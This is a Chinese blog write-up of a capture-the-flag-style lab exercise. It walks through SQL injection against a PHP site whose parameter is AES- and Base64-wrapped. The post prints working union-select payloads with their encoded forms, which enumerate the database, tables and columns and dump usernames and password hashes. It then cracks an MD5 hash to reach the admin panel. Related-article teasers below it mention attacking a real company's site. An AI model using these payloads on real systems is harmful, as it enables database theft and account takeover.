payload sql注入_SQL注入漏洞测试

最新推荐文章于 2024-06-21 15:59:17 发布
最新推荐文章于 2024-06-21 15:59:17 发布
阅读量439 收藏
点赞数
文章标签: payload sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39926103/article/details/114906617
版权

SQL注入漏洞测试

--Write Up

题目用到的工具

AES加密网站:

http://tool.chacuo.net/cryptaes

BASE64加密网站:

https://www.sojson.com/base64.html

MD5加密网站:

https://www.cmd5.com/

1.靶场

https://www.mozhe.cn/bug/detail/SjRRVFpOQWlLWDBJd3hzNGY5cFBiQT09bW96aGUmozhe

http://219.153.49.228:49104/,使用御剑扫描得到

982b8f809c535de732a52f232fdd403a.png

http://219.153.49.228:49104/news/

11404c5ce357333ea2cb9084cb7f5cb8.png

4.下载压缩包,打开代码进行PHP代码审计。得到的信息如图所示

4f785efd6a9db09a87f000c88ec5f5df.png

加密模式为cbc,数据块为128位

第7行:AES的加密长度是128位,秘钥密码为:ydhaqPQnexoaDuW3,偏移量为:2018201920202021。

第8行:数据进行两次base64加密,再进行一次aes加密。

第11行:判断字符串是否存在“_mozhe”所以构造playload的时候先将注入的字符串末尾加上”_mozhe“字符,然后进行AES加密,因为AES默认是进行了一次base64加密,所以AES加密之后只需要进行一次base64加密即可。

5.针对题目进行SQL注入操作

89ab2a5ea12cb903b3797762cf4e628b.png

6.进行SQL注入操作判断字段数

Payload:1 and 1=2 union select 1,2,3,4,5_mozhe

AES:

494915a7f2f8cac927472b2b0c3e859b.png

0hMY7i4yFMb48GTM7O6GEp0IATyHtqb63cXGExm18A1cwdcjbMaDZ+wjDyyQLtGv

Base64:

0cbdd27aebeb7578561089c83a9e1266.png

MGhNWTdpNHlGTWI0OEdUTTdPNkdFcDBJQVR5SHRxYjYzY1hHRXhtMThBMWN3ZGNqYk1hRFord2pEeXlRTHRHdg==

参数为4的时候显示正常,5的时候显示错误,说明有4个字段。(后面使用同样的加密方式,图在不截取)

7.进行SQL注入操作判断显示为

Payload:-1 union select 1,2,3,4_mozhe

AES:xgd58ipTrnx8VzS*JicqCo3+zFFzhay5byFU3cjbdeI=

Base64:eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=

显示为2和3

c76d53e7592eb4bbba745e165f32e133.png

8.进行SQL注入操作判断当前数据库

Payload:-1 union select 1,database(),3,4_mozhe

AES:xgd58ipTrnx8VzSBJicqCkfa8baY1gC/rbon/boeWRtc5yGs6NJR/uwTC/R61dXI

Base64:eGdkNThpcFRybng4VnpTQkppY3FDa2ZhOGJhWTFnQy9yYm9uL2JvZVdSdGM1eUdzNk5KUi91d1RDL1I2MWRYSQ==

获得数据库

4f2bf3811b4e51132e9325f16c195472.png

9.进行SQL注入操作爆表

Payload:-1 union select 1,group_concat(table_name),3,4 frominformation_schema.TABLES where TABLE_SCHEMA='mozhe_Discuz_StormGroup' limit0,1_mozhe

AES:xgd58ipTrnx8VzSBJicqCtnxUkLmTyTBAkYq0YotB+2TUlxiaZHz+pFXJJAjk7w7mWa1h8buWVm1L1FnzJByUaKbAWj5+Uvrzr7N78VJwtWqXC3DaqUEdvGNHEt3e3p8sJjsRBKuAUivvxYEe/FJXQ+Ppo/ZQZxYCAcfTSULqO2uPUUua7ymFeOl8Vh0umZM

Base64:eGdkNThpcFRybng4VnpTQkppY3FDdG54VWtMbVR5VEJBa1lxMFlvdEIrMlRVbHhpYVpIeitwRlhKSkFqazd3N21XYTFoOGJ1V1ZtMUwxRm56SkJ5VWFLYkFXajUrVXZyenI3Tjc4Vkp3dFdxWEMzRGFxVUVkdkdOSEV0M2UzcDhzSmpzUkJLdUFVaXZ2eFlFZS9GSlhRK1Bwby9aUVp4WUNBY2ZUU1VMcU8ydVBVVXVhN3ltRmVPbDhWaDB1bVpN

获得数据表

85805c337302572218b9f710338a9b35.png

10.进行SQL注入操作爆列

Payload:-1 union select 1,group_concat(column_name),3,4 frominformation_schema.columns where table_name='StormGroup_member' limit 0,1_mozhe

AES:xgd58ipTrnx8VzSBJicqCuvzwQ04ka/PubBNkKJyJETUw/zaWGzAKbj8oM1RQbhWBZatBUkuYe+z+0t8InzKQx67ln0rLohI3CVUkkZVnDk7TeTPx0KV5T85dUqw/YqCs+jTm3PW2rT6JyNPVUvNyLKt/kE3BA14YNBXkcONpiwxBbntstS+bLOJsydl7WHA

Base64:eGdkNThpcFRybng4VnpTQkppY3FDdXZ6d1EwNGthL1B1YkJOa0tKeUpFVFV3L3phV0d6QUtiajhvTTFSUWJoV0JaYXRCVWt1WWUreiswdDhJbnpLUXg2N2xuMHJMb2hJM0NWVWtrWlZuRGs3VGVUUHgwS1Y1VDg1ZFVxdy9ZcUNzK2pUbTNQVzJyVDZKeU5QVlV2TnlMS3Qva0UzQkExNFlOQlhrY09OcGl3eEJibnRzdFMrYkxPSnN5ZGw3V0hB

获得数据表

4de0ade9dcf4252db7799a1a8b5215f2.png

11.进行SQL注入操作爆字段

Payload:-1 union select 1,group_concat(name,password),3,4 fromStormGroup_member limit 0,1_mozhe

AES:xgd58ipTrnx8VzSBJicqCrKk6D6pYYlFPPQb9jGbVkT6Sq341dUA+jAehyAsFGEMkdGEBx+tcSd01GxR71oQIUtomLjZsBcC+guMwmzo/hT4R/YTgXBUsAADJ25UU/+P

Base64:eGdkNThpcFRybng4VnpTQkppY3FDcktrNkQ2cFlZbEZQUFFiOWpHYlZrVDZTcTM0MWRVQStqQWVoeUFzRkdFTWtkR0VCeCt0Y1NkMDFHeFI3MW9RSVV0b21MalpzQmNDK2d1TXdtem8vaFQ0Ui9ZVGdYQlVzQUFESjI1VVUvK1A=

获得密码MD5值

9d3018b61c1a36ef3a5dee9bc8ca2166.png

12.对获得的MD5进行解密19e51305f4926559333371ae20d27517

206039ba81adf8e5cde3f58a475c1897.png

13.登录后台获取flag

菜鸟班门弄斧,大佬勿喷!

weixin_39926103
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞网站源码.zip
08-27
之前在比赛里撸下来的网站源码,有前端常见的漏洞,可以复现找bug,都是漏洞很基础的网站,比赛中很常见的网站。
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 961
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
SQL注入payload速查--MySQL
最新发布
2301_81609355的博客
06-21 331
SQL常见注释符有"#“和”–“以及内联注释”/*!*/"【1】【2】【3】【4】【5】【6】【7】延时注入和布尔盲注是一种工作量很大的注入方式,在允许的条件下,建议直接使用sqlmap或者自己编写自动化脚本来减少注入的工作量。
实战真实网站的SQL注入
qq_55376995的博客
12-24 6450
某建设投资集团股份有限公司网站存在SQL注入一、发现过程1.使用百度语法寻找可能存在SQL注入的网站:inurl:?id=12.发现一个网站进去看看3.尝试手工注入:?id=1106'?id=1106-1?id=1106-24.发现页面发生变化,可能存在SQL注入二、漏洞利用1.这里使用sqlmap进行注入检测表:​检测字段:检测数据:4.然后跑出用户名和密码,但密码是加密过的,我用MD5解密最后得出。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 8151
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
渗透测试-SQL注入-登录漏洞-Burp爆破
fjc0214的博客
12-04 882
比如:position中A处有a字典,B处有b字典,则a【1】将会对应b【1】进行attack处理,这种攻击类型非常适合那种不同位置中需要插入不同但相关的输入的情况。比如:position中A处有a字典,B处有b字典,则两个字典将会循环搭配组合进行attack处理这种攻击适用于那种位置中需要不同且不相关或者未知的输入的攻击。请求的总数是payload组中payload的总数。中,因为没有设置登录失败的次数限制,所以可以通过Burp爆破的方式进行登录,从而获取到登录的用户名和密码,进而登录到系统中。
SQL_Injection_PayloadSQL注入有效负载列表
01-28
1. **SQL注入漏洞**:当Web应用程序在构建动态SQL查询时,不加验证地将用户输入的数据拼接到SQL语句中,就可能导致SQL注入漏洞。攻击者可以通过操纵输入来插入额外的SQL命令。 2. **类型识别**:了解目标数据库的...
自己动手编写SQL注入漏洞扫描工具
06-22
标题中的“自己动手编写SQL注入漏洞扫描工具”指的是创建一个能自动检测Web应用程序是否存在SQL注入漏洞的软件。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取敏感...
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
SQL注入漏洞演示源代码
05-03
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理及其防范措施。 SQL注入漏洞通常发生在Web应用...
基于爬虫的sql注入漏洞检测工具
05-16
本项目“基于爬虫的sql注入漏洞检测工具”旨在自动化检测这种漏洞,保护网站免受此类攻击。 首先,我们来深入理解SQL注入。当一个Web应用没有对用户输入进行充分的验证和清理,它可能会在构建动态SQL查询时直接使用...
asp-sql注入源码
04-17
asp-sql注入源码(存在sql注入的asp源代码,供大家学习)
YXcms-含有SQL注入漏洞的源码包.zip
03-17
YXcms-含有SQL注入漏洞的源码包,亲测可用真实有效,如有侵权,请联系CSDN管理员删除即可
SQL注入:sqlmap布尔型盲注payload解析
无名J0kзr的博客
10-07 3849
难受 占坑明天更
web十大漏洞--sql注入
m0_71907084的博客
10-30 1502
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
UC某网站SQL注射漏洞
swordheart的博客
04-15 1707
漏洞详情 披露状态: 2010-07-26: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-25: 细节向公众公开 简要描述: UC某网站存在SQL注射漏洞。 详细说明: wap网站中的 http://wap.uc.cn/ucpack/dlmobile/control/generic_p
常见的网站漏洞——SQL注入
计算机硕士的博客
04-15 622
常见的网站漏洞——SQL注入
SQL注入(1)--判断是否存在SQL注入漏洞
qq_51550750的博客
02-14 8650
什么是SQL注入 不论是学习后端开发/数据库/网络安全,SQL注入安全隐患反复被提起 到底什么是SQL? 维基百科的定义: (1)什么是SQL? SQL是用来操控数据库的语言 (2)举一个例子,现在我们要查询电影“长津湖”的票房数据: 先想象一下开发人员是如何书写代码从数据库中拿到数据的: 作为一名黑客如何思考? SQL注入靶场练习- DVWA(1) 【1】首先将security调为low: (记住要点击“submit”) 【2】然后挑战模块SQL Injection 首先尝试正常的 【
搜狗某网站存在SQL注射漏洞
swordheart的博客
04-17 4729
漏洞详情 披露状态: 2010-07-30: 细节已通知厂商并且等待厂商处理中 2010-07-30: 厂商已经确认,细节仅向厂商公开 2010-08-09: 细节向核心白帽子及相关领域专家公开 2010-08-19: 细节向普通白帽子公开 2010-08-29: 细节向实习白帽子公开 2010-08-29: 细节向公众公开 简要描述: 搜狗某网站存在SQL注射漏洞 详细说明: 搜狗BBS论坛存在SQL注射漏洞,可进行导表。 漏洞证明: http://bbs.sogou.com:80/sim
sqlmap使用详解:自动化SQL注入工具
手册详细解释了sqlmap的功能和操作流程,包括它如何检测和利用不同类型的SQL注入漏洞,以及支持的数据库类型。" sqlmap是一款自动化工具,专门用于检测和利用SQL注入漏洞。当你提供一个URL给sqlmap时,它会执行一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值